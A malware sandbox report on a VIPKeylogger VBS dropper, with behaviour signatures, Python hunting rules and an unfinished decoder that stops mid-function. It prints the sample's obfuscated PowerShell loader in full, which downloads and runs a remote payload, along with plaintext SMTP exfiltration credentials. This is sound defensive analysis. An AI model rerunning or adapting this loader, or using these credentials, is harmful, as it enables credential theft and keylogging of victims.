Analysis
max time kernel: 107s
max time network: 124s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 24-10-2024 01:21
Static task: static1
Behavioral task: behavioral1
Sample: 31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
Resource: win7-20241010-en
Behavioral task: behavioral2
Sample: 31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
Resource: win10v2004-20241007-en
General
Target: 31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs
Size: 530KB
MD5: d281f65b5323332d8061568ce377ea0b
SHA1: 67230ca5abe0f13217a34801be32ff2d573692fa
SHA256: 31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a
SHA512: 6a163cb0202bec65ff0d66df700e93ac6c051469a9c5e4d1e68b2be1e7886f70f69a290e8c2b5e39c1d362d2783942c81561685465149cf6ab75c9d606ee2d16
SSDEEP: 6144:or/7TXNXM0vl4byj8e8j9317d6AMGsP8lLJIRChb6peTUy6TcWFhyuNgtjzfzycT:iSmlcIyYA/sEJQcb0ctuNOLycdeg
Malware Config
Extracted: vipkeylogger (exfiltration over SMTP)
Protocol: smtp
Host: mail.minhlamcons.com
Port: 587
Username: [email protected]
Password: @Tran@123456
Email To: [email protected]
Signatures
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it closely resembles SnakeKeylogger, which was first seen in 2020.
Blocklisted process makes network request 10 IoCs
Processes:
flow  pid   process
3     2528  powershell.exe
5     2528  powershell.exe
8     2092  msiexec.exe
10    2092  msiexec.exe
12    2092  msiexec.exe
14    2092  msiexec.exe
15    2092  msiexec.exe
17    2092  msiexec.exe
19    2092  msiexec.exe
21    2092  msiexec.exe
Command and Scripting Interpreter: PowerShell 2 IoCs
Processes:
pid   process
2528  powershell.exe
2732  powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
16    checkip.dyndns.org
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
pid   process
2092  msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
pid   process
2732  powershell.exe
2092  msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempts to gather information about the system language of the victim in order to infer the geographical location of the host.
Processes:
description  ioc                                                          process
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  msiexec.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
pid   process
2528  powershell.exe
2732  powershell.exe
2732  powershell.exe
2092  msiexec.exe
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
pid   process
2732  powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
description              pid   process
Token: SeDebugPrivilege  2528  powershell.exe
Token: SeDebugPrivilege  2732  powershell.exe
Token: SeDebugPrivilege  2092  msiexec.exe
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
PID 2280 (WScript.exe) wrote to memory of 2528 (powershell.exe), 3 writes
PID 2732 (powershell.exe) wrote to memory of 2092 (msiexec.exe), 8 writes
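The behaviours above describe one delivery chain: WScript.exe launches powershell.exe, and a second (32-bit) powershell.exe launches a bare msiexec.exe that it then writes into (WriteProcessMemory, MapViewOfSection). The hunting rules below are an added example written for this write-up, not sandbox output and not code from the sample. The event list is constructed from the report's process tree in a Sysmon-like shape; the field names, the abridged PowerShell command line and the parent pid of 2732 (the report shows it as a top-level process and records no parent, so it is set to 0) are assumptions.

```python
"""Hunting rules for the delivery chain recorded in this report (added example)."""

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows Script Host binaries
BARE_HOSTS = {"msiexec.exe"}                   # injection host seen in this report

SAMPLE = "31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs"

# Constructed from the Processes section: pids, images and command lines are the
# report's; the two PowerShell command lines are abridged to their opening bytes.
EVENTS = [
    {"pid": 2280, "ppid": 0,
     "image": r"C:\Windows\System32\WScript.exe",
     "cmdline": r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\%s"' % SAMPLE},
    {"pid": 2528, "ppid": 2280,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne #>;$Stjlendes=...;"'},
    {"pid": 2732, "ppid": 0,  # parent not recorded in the report (assumption)
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne #>;$Stjlendes=...;"'},
    {"pid": 2092, "ppid": 2732,
     "image": r"C:\Windows\SysWOW64\msiexec.exe",
     "cmdline": r'"C:\Windows\SysWOW64\msiexec.exe"'},
]


def basename(path: str) -> str:
    """Last component of a Windows path, original case preserved."""
    return path.rsplit("\\", 1)[-1]


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line on whitespace outside double quotes."""
    args, cur, quoted = [], [], False
    for ch in cmdline:
        if ch == '"':
            quoted = not quoted
        elif ch.isspace() and not quoted:
            if cur:
                args.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        args.append("".join(cur))
    return args


def lineage(by_pid: dict, pid: int) -> str:
    """Ancestry chain for context, e.g. 'WScript.exe(2280) > powershell.exe(2528)'."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append("%s(%d)" % (basename(by_pid[pid]["image"]), pid))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(chain))


def hunt(events: list) -> list:
    """Return (rule, lineage) pairs for every parent/child pair that matches a rule."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e["ppid"])
        if parent is None:
            continue  # top-level process: nothing to correlate against
        child = basename(e["image"]).lower()
        par = basename(parent["image"]).lower()
        # Rule 1: a script host spawning PowerShell (the .vbs stage of this report).
        if par in SCRIPT_HOSTS and child == "powershell.exe":
            findings.append(("script_host_spawns_powershell", lineage(by_pid, e["pid"])))
        # Rule 2: PowerShell starting a known injection host with no arguments at all;
        # a legitimate msiexec.exe invocation carries a package or /i, /x, /q switches.
        if par == "powershell.exe" and child in BARE_HOSTS and len(split_cmdline(e["cmdline"])) == 1:
            findings.append(("powershell_spawns_bare_host", lineage(by_pid, e["pid"])))
    return findings


if __name__ == "__main__":
    for rule, chain in hunt(EVENTS):
        print(rule, "->", chain)
```

Rule 2 deliberately keys on the empty argument list rather than on msiexec.exe itself: the same 32-bit PowerShell that starts the process is the one the report shows writing to its memory and mapping a section, which is the shape of a hollowed host rather than an installer run.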
Processes
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31c400430c28c2ca29976d862878eeb2c365ae4f4afc450eaa6459364cac143a.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2280
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. 
kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. 
');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot 
loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft 
');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Svmmehud Undertitlerne Preambulation styledom Psorospermial Stemmesamlernes Tchervonets #>;$Stjlendes='Sellouts';<#Lawrencite Unapprehensiveness Fiskeretter shaughn spunsen Kapsejse #>;$Soilless=$Climatometer+$host.UI; function Forhandlingsresultat($Minyae){If ($Soilless) {$Aendrings++;}$Underminister=$Syttenaariges+$Minyae.'Length'-$Aendrings; for( $outdrag=5;$outdrag -lt $Underminister;$outdrag+=6){$Slidte=$outdrag;$Isklumper+=$Minyae[$outdrag];$Tvangsfodrendes='Scandalmonging';}$Isklumper;}function Restrainedness($Skyggeregeringers){ & ($Conacaste) ($Skyggeregeringers);}$Befattedes=Forhandlingsresultat 'ShoweMNonsloacidizBastai SeislOpskrl S,buaAgill/Udra. ';$Befattedes+=Forhandlingsresultat 'Ou sm5Cicad.Misfi0Parth .ngra(LyingWunsaliinsatnLa,godFasteoPimp wBrandsSamme Astr.NSplinTOverb Raa a1Pavel0Hjti .Symas0Eskad;Sogne CollW inquiDefinnWh.gg6Raasy4coffi;Skrd. Overx Comm6 Chap4Cho e;Perso strarChattvAblat:Indv 1Nor a3G thr1Flaad.Pickl0,redi)Nybo. MahuaGErgoteVoldgcWith.kViol oTredi/elekt2St bb0fyrst1Deta 0 Byst0For r1 Ba t0Ignic1 Mega Tet FPhiloi udgerFyldiebagepf Haaro Pac,xSonne/Prude1Udrig3Bestt1Anisa.Servi0Sjlek ';$Manutagi=Forhandlingsresultat ' SynsU earlS f rhE areoRsaldo-SedatASkaf,GStemnEPengen.ncontDrypn ';$Abonneringens=Forhandlingsresultat ' Troph K altDeclit.eminpV gtmsIndaa:Qu tt/Chi v/OpskrdSyriorirefaiPhysivin,oneBetn . AandgImmesoSvrdlo SogngSterslMiljteHoved. 
kldecVaneloUnculmSv rp/ KlasuRa llcStill?KlatteStranxYav,lp Luddo Of erfrowat,jerg=I teldCrusho Bel,wN,vinnAeterlJyll oNonteaTugthdStang&Cyn pi D.ugdOxh a=,lerf1RafteTFaldeAViz r1EdgarG LovlpMidchPImp,tnAcerotAar ii ReacmFile J dealrPark _ ApokvDa arhUrovaKSuperONo.suzBetal8HemopWYuckip Untrm khoj1 ,atevP.macCCo.sepBrasnPInterCIndpiZStyr.8Priap2 B,anQ Sove ';$Forkromningens=Forhandlingsresultat 'Overp>Tribu ';$Conacaste=Forhandlingsresultat 'Sublai hivaeButtexUntri ';$Staatrolds='Trafikministers';$outdragntermural='\Bromley228.Alb';Restrainedness (Forhandlingsresultat '.onfo$DowncgS mlelHovedOTre eBCampaA FjerLpjatt:BowlfAUnva MPerfob halvaFrancsOve,sSHugorAVultudSulphEPreheFFjll UCalipN SmelK ountt Urini PlumoDurumNFejlmRDr psE TrumR ammo= curr$ S ude Se,vN den.Vudrin: DomkaPriorPSamlePR tjrdDoursaOxr it,ndelADuble+Pr co$Com rO Du,bU PaakT FratDP oprR FlanaMalp gInducnOve.ptMiljoEProacRscareM Bambu VlliR NasuA elevLMatti ');Restrainedness (Forhandlingsresultat 'Daarl$Entr.g SorglSlaviOPreloB SpanaViktuLDataa:No eaLAugmeUBerlimSub,apWu.gie HydrNMultih h,ere R.koDM sku= Ta m$OmproabergaBDisadO Kontnb gniN EverESuppoRGeneriViriaNFarvegSjle e SympnIndigS Pte . Fil.SAcci,POr,reLGenstI seistThrop(Respe$MemorFSpherOFrillR A.gdkscam.r .unsoBarram ptimnSucciIAflejnHepargProgeEKebbynDobbesF uit)Medde ');Restrainedness (Forhandlingsresultat ' Ener[Amm nNMagn eM nertHep o.Akto S Overe Bailrrnt eVval ti G,odC PhthE QuinPPseudO SporiLuftanRacebTAnkomMKydmiaFrostNFredsaBare,GPas hesauteR Curr] Rejf:Jackw:DogiesDe unE ForncCircuUTurnbrTeh,rIHarveTBubsrY HephPAp idRTambao odelt pladO Per cTvivlORekomLMarks ,ingd=Atoms Galac[ ErhvNMaoriE .eksTChart.TchtrS Moute Ailwc kovuYds,lrsus eISinatt AfkayS ambPNon rrRefleoBeardTHardwOKaffecDreadOPin aLA ardtDbefoYIslanpPra seInter]Trini:Genop: rkltS verl hovesSigt 1 Kodf2Udbi. 
');$Abonneringens=$Lumpenhed[0];$Teaseler=(Forhandlingsresultat 'Parti$Ch maGUd alL indrOLjer B Supea Dor L Heb,:AccussKu tuK Vi iuSanktmRaastRCensoISolf.NSkeergKardaeunde R Scar2Simil1Swaye9tawnr=WightnKethvETekyaW,mbiv-RanklOTrioeB eccejBifo,E.unktc fpatTjeof K nves.romiy R.ucSPrecotSulphe,otioMFlles.Ddsdrn rom E goosTAuti .,tadiwBumpteFal ub A tocUrenlLS umkI Bople ndbrnChokeTO,trv ');Restrainedness ($Teaseler);Restrainedness (Forhandlingsresultat 'F dse$NoncoSOff,nkFjortu.elexmMalapr Co liSk manR,dfogFore eDi,tar Carn2Ventr1 Vice9Ge,ne.Om efHFortreLaaneaTyvted Ha dedipyrrpyrogsponto[Myr,n$ SnvrMPr jeaHcfganNarreupetunt Vacca yphlg HaaniKombi]S nke=Zeb r$Snud BMontreEfterf FromaGldeltInduktFormueRu kadApproeS,llys Nwaf ');$Coolths=Forhandlingsresultat ' Unsu$Gab,oSElfenkRus.au LizamHermarStetiiAgglunSycongunic e Mis r Rn g2 T.od1 M rr9Dandi. snekD aigroE.terwCivilnCirc lCanvaoAfraka TilsdCapesFPi.eli Betrl Ou geLacti(Tredo$ SemiA Min bUn.haodireknFilsynJeopaeFrifir SvoviNordsnE velgFuggyeNebulnhaughsSo,ri,Pendu$LarisE udp xColosaBanglc HjfotCartoiEsseln AtekgBarocnSnegleGua as Skr.sIrrea)Miaou ';$Exactingness=$Ambassadefunktionrer;Restrainedness (Forhandlingsresultat 'Pligh$KompaGMar il KnolO Omgib Midea,ooktlStyrk: lluESomitn elvsTTolleo LiggZItal.o,bseqORacemLSolopOI adoGGasmoYVide =Progn(P epatBl phEAeratS EuryTBaske-L mpfP.ninsaProfatCistuhOpist omm$Seriee AftexAde.saSa,meC anket ElekiTableN IncagDida,NBradyERenses.isses Poly)Th.or ');while (!$Entozoology) {Restrainedness (Forhandlingsresultat 'trich$ pr,ggSuslilAnraaoSkgg,bBastsaSambel Mis : ircuBF.ugalInexod orykPressoTetragErhvetAskileBri t=Torpe$ Ma rtkorporMidw,uHepateS ege ') ;Restrainedness $Coolths;Restrainedness (Forhandlingsresultat 'LivsvsPrecrtPseudABaandrPri utGranu-Phospsselsklt lske harpETube PHar w veld 4 Blan ');Restrainedness (Forhandlingsresultat 'Progr$SplingS anglCo ruo.resubHaugjaNrbillFrels:PentaeEllarn T,opT KirkoDet.lZRot 
loMiljsofrot,LMalacOSkuldgTrojkyLaven=Erupt(DokstTG.assEUntraSFarveT Oluf-M grap DansA EskaTTenchhUn xt Gun.r$UdskieHand XGstepA P noCPreseTBallvIGlan.nUnwr,GSqu bNSquibeUbetis UdsaS Soci)Gtevi ') ;Restrainedness (Forhandlingsresultat 'Nabol$ScrotgCherrLNonduOG.lebBCoaxbaCytopl Aulo: DesiAdiffeLPrepitScienI bskuNnonusG La,yS nsufm ispe UncoDSk msL TropEave iM A,demGustaeSubtaTbal a=Aflaa$HjemmGZ.oniLKommaOAxmi BGlasfAVs erlFljls:TunedhMye iJAmortoSituarfuldftMeno eDecisTKkkenAEkstrkCre,ckPostveFurroR PettnChu kEtru l+F rar+Ditta%Tvind$muligL OverUBillemneuroPUncaueBarslNSymbiHHollaeSpecidNeger.SubdaCMete.Ons koUAbidin olfrTClock ') ;$Abonneringens=$Lumpenhed[$Altingsmedlemmet];}$Finansforbundet71=329570;$Fordunklet=31115;Restrainedness (Forhandlingsresultat 'Smaa $ o eggSkibilIn tiOUn erBFossiaB rbalSyste: CrainF mesOL,mstNFootlmAdvisE Oar NApostI CornABiblil So.el roncYHeter .edb=Exord S oleGEn soEMo teTAnalo- SkarcTransokalveNDenoutThusnEFrdigNForb tDlgsm ellu$E,aste An.sxKommaAMyte,CDiftoTRestriSpannnUpborGBegrenP polEU godsJoedesStorm ');Restrainedness (Forhandlingsresultat 'Talef$KorpugC,menl DissoFrikab anelaUsneal .eos:TrikiFMinefiA tilnCamb.tHomocfCircooProlorVivarmCopereMu,ketPr,gr Incon=Aaben Whor[A pinSDatabyF ltlsStaunt B oee.kattmFrows.UrlbrC utchoPlayenW rkevK jseeShmucr slastAppli]Sna.s: R.de:UforeFP neurAarsiosloppm fsvaBKnifeaS olasBrasieSta s6sla.k4 IneaSSkakbtFag er Rhi iP.ymonS natgA esl( Ethn$UgeblNScripoHymennsp akmTidyleObs.rnMisr.i.dygta FyrslAntial reaty Lysl)Gadeu ');Restrainedness (Forhandlingsresultat ' Fer $MisgagFort lCoboloDamspBYesseaDvuarLNonco:Erf,rV reagiUnikarFestiGQu,niU Ove,lHoveraBleezr LethIStra AScopo Miswe=Past Knibt[ TankS eriwy Unf.s ushoTSpiree U remPrese.Decc TCospoeRejseXanfrsTG.lle.RivedEBlameNCalaicSi.naO RequDSlotsIA umiNPerifgremed] usar:Hjemm:CrockAVandssPhrygc.croui erreiDis,o.DecimgSummeEAirspTIntonsUnitat De prSpiraiEvapoNRetteg Ext.(Udlov$SorbifdieseI H,aen E clt Un,rFLynn.O naemRLiturmUnacteKvintt.msme)Hl.ft 
');Restrainedness (Forhandlingsresultat 'Megal$AdvergInd.rl TranO AddrbMerobA SupeL B gl:EuropkNonacAFedenrCospoDKonstiGasopNFluktaGaugel Fri iOveret Hibee BefrtAkti EAmbilnCivilsBioa =Leget$opkrvvMatteIslageRBicalg SpicUParabLEnkelaInterRE,veriMonopAM,lta.AarsvSFyrafuAktorBTenenS Ka.ktTykmlrTiltaI HjlpnOpslig Unav(Boord$FamilF FibrIGennenDo gtAStereNVas,tS hackfStuepoOrdnur Pr vb SympU restNDistrd icate Invetindkr7 Prer1Hoped,Overs$NukleFKommuOGravhrNsugrdSkyldu ivsfNFritaKUnderLAst oE Phart Tegn) ouc ');Restrainedness $Kardinalitetens;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2732
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
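The two powershell.exe command lines above carry the same script. Every string it uses is passed through the function it defines as Forhandlingsresultat, and Restrainedness runs the result through `&` with $Conacaste, which itself decodes to iex; the filler between the payload characters is Danish vocabulary. The decoder below is an added example written for this page (not the sample's code and not sandbox output): it reimplements the function in Python and runs it over literals copied verbatim from the captured command line. One caveat for anyone decoding from this page rather than from the .vbs: the extracted text has dropped non-ASCII letters (æ, ø, å; compare "Svmmehud" in the leading comment), which shifts the 6-character alignment of any literal that contained one. The block therefore uses only literals that survived intact; the continuation of the User-Agent string and the $Abonneringens literal, which starts as https://drive.google. before the damage, need the original script.

```python
"""Decoder for the PowerShell string obfuscation in this report's command lines (added example)."""
import re

# Name of the decode function as it appears in the captured script.
DECODER_NAME = "Forhandlingsresultat"
CALL_RE = re.compile(re.escape(DECODER_NAME) + r"\s+'([^']*)'")


def deobfuscate(literal: str) -> str:
    """Mirror of Forhandlingsresultat: keep the character at index 5 of each 6-char chunk.

    The original loop is `for ($i = 5; $i -lt $Length - $Aendrings; $i += 6)`.
    $Aendrings is incremented once per call (the guard is $host.UI, never null
    in powershell.exe), so the bound is Length - 1 and the trailing pad
    character of every literal is skipped.
    """
    return "".join(literal[i] for i in range(5, len(literal) - 1, 6))


def decode_calls(script: str) -> list:
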